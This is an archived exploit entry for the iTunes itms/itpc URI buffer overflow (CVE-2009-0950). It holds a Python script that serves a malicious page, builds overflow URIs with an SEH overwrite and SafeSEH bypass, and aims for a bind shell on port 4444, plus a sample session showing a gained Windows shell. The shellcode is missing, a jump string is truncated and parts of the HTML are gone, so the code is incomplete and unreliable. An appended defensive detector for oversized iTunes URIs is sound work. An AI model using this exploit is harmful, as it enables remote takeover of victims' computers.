Apple iTunes (Windows) - itmsitcp Remote Buffer Overflow

Type exploitpack
Reporter ryujin
Modified 2009-06-12T00:00:00



# Apple iTunes itms/itcp BOF Windows Exploit
# Matteo Memelli | ryujin __A-T__
# Spaghetti & Pwnsauce - 06/10/2009 
# CVE-2009-0950
# The vulnerability can't be exploited simply by overwriting a return address on
# the stack because of stack canary protection. Increasing the buffer size leads
# to an SEH overwrite, but it seems that the Access Violation needed to get our
# own Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URIs to iTunes:
# - the 1st payload corrupts the stack (it doesn't overwrite the cookie, no crash)
# - the 2nd payload fully overwrites SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE, which seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes,
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
# ryujin:Desktop ryujin$ ./ 
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__
# [+]
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from:
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 4444
# Connection to 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Mozilla Firefox> 

from socket import *

# NOTE: the <html>, <script> and <body> tags and the bodies of ipwn() and main()
# are missing from this copy of the exploit; the HTML fragment is kept as archived.
html = """
  <head><title>iTunes loading . . .</title>
   function openiTunes(){document.location.assign("itms://");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
   function main() {
    // Increase this timeout if your iTunes takes more time to load!
  <body onload="main();">
    <p align="center">
    <b>iTunes URI Bof Exploit Windows Version CVE-2009-0950</b>
    <p align="center"><b>ryujin __ A-T __</b></p>
    <p align="center"><b></b></p>
    <p align="center">
    iTunes starting... wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444 :)<br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!<br/>
"""

# Alpha2 ASCII printable shellcode, 730 bytes, via EDX (0x60, 0x40 badchars).
# This is not a standard Alpha2 bind shell. The beginning of the shellcode is
# modified in order to obtain register alignment and to reset the ESP and EBP
# we mangled before. The rest of the decoded shellcode is a Metasploit bind
# shell on port 4444, EXITFUNC=thread.
# PLACEHOLDER: the encoded shellcode itself is not present in this copy of the
# exploit, so the variable is left empty here.
shellcode       = ""

# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

# Encoded jmp back into the shellcode; the string is truncated in this copy of
# the exploit, only its first characters survive.
jmp_back        = "UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
# Padding
pad0x3          = "\x43"*162

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/"
url2            = "itpc://:" + pad0x1 + align + shellcode + pad0x2 + \
                  align_for_jmp + jmp_back + pad0x3
payload         = html % (url1, url2)

print "[+] iTunes URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__"
print "[+]"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("", 80))
s.listen(1)                     # listen/send/close were missing from this copy
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.send(payload)
c.close()
s.close()
print "[+] Payload sent, wait 20 secs for iTunes error!"
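The header comment explains that the two URIs handed to iTunes are long, padding-heavy itms:// and itpc:// strings with an empty host and an ASCII-printable encoded payload. The following is an added example (not part of the original exploit, written for Python 3) of a simple detection heuristic a defender can run over HTML or proxy-captured page bodies: it extracts iTunes protocol-handler URIs and flags those that are oversized, consist of long runs of a single padding character, or carry an empty host. The scheme list, the 512-byte length threshold, the 64-character run threshold and the sample HTML are all assumptions constructed for the example.

```python
import re

# iTunes protocol handlers that the exploit above drives through
# document.location.assign(); the list is an assumption for this example.
ITUNES_SCHEMES = ("itms", "itpc")

# A URI ends at whitespace, a quote or an HTML angle bracket.
URI_RE = re.compile(r'\b(?:%s)://[^\s"\'<>]*' % "|".join(ITUNES_SCHEMES),
                    re.IGNORECASE)

MAX_URI_LEN = 512      # constructed threshold: store links are far shorter
MAX_CHAR_RUN = 64      # constructed threshold: padding shows up as one repeated byte


def longest_run(text):
    """Length of the longest run of one repeated character in text."""
    best = cur = 0
    prev = None
    for ch in text:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best


def analyse_uri(uri):
    """Return a dict describing one iTunes URI and the heuristics it trips."""
    scheme, _, rest = uri.partition("://")
    run = longest_run(rest)
    findings = []
    if len(uri) > MAX_URI_LEN:
        findings.append("oversized")
    if run >= MAX_CHAR_RUN:
        findings.append("padding-run")
    if rest.startswith(":") or rest.startswith("/"):
        findings.append("empty-host")
    return {
        "scheme": scheme.lower(),
        "length": len(uri),
        "longest_run": run,
        # the exploit needs a pure ASCII-printable payload; record that property
        "printable": all(32 <= ord(c) < 127 for c in rest),
        "findings": findings,
    }


def scan_html(text):
    """Analyse every itms:// or itpc:// URI found in a page body."""
    return [analyse_uri(m.group(0)) for m in URI_RE.finditer(text)]


def flagged(text):
    """Only the URIs that tripped at least one heuristic."""
    return [r for r in scan_html(text) if r["findings"]]


# Constructed sample page: one benign store link plus two URIs shaped like the
# exploit's url1 and url2 (padding only; no encoded payload is included).
SAMPLE_HTML = (
    '<html><head><script>\n'
    'function openStore(){document.location.assign("itms://store.example.com/album?id=123");}\n'
    'function prepareStack(){document.location.assign("' + "itms://:" + "A" * 200 + '/");}\n'
    'function ownSeh(){document.location.assign("' + "itpc://:" + "A" * 600 + '/");}\n'
    '</script></head><body onload="openStore();"></body></html>\n'
)

if __name__ == "__main__":
    for r in scan_html(SAMPLE_HTML):
        print("%-5s len=%-4d run=%-4d printable=%s findings=%s"
              % (r["scheme"], r["length"], r["longest_run"],
                 r["printable"], r["findings"]))
```

The 200-byte url1 shape from the exploit stays under the size threshold, so the repeated-character check is what catches it; url2 trips all three heuristics. Tuning the two thresholds against real store links is the main operational decision.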

# [2009-06-12]